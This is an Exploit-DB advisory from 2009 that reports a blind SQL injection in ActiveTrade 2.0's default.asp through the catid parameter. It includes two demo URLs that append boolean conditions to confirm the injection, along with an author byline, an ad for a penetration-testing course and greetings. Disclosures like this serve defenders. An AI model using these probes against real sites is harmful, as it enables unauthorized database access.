ActiveTrade 2.0 - 'default.asp' Blind SQL Injection

EDB-ID:

10166

CVE:

N/A


Author:

Hussin X

Type:

webapps


Platform:

ASP

Date:

2009-11-17


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

Active Trade 2.0(default.asp) Blind SQL Injection Vulnerability
____________________________________

Author : Hussin X

Home : www.IQ-TY.com

email : hussin.x@gmail.com

____________________________________

Vendor : http://www.activewebsoftwares.com

Demo :
_______

http://server/default.asp?catid=39+and+1=1 ( true )

http://server/default.asp?catid=39+and+1=0 ( false )


Greetz :
WwW.IQ-ty.CoM

| CraCkEr | Cyber-Zone | str0ke | kadmiwe | jiko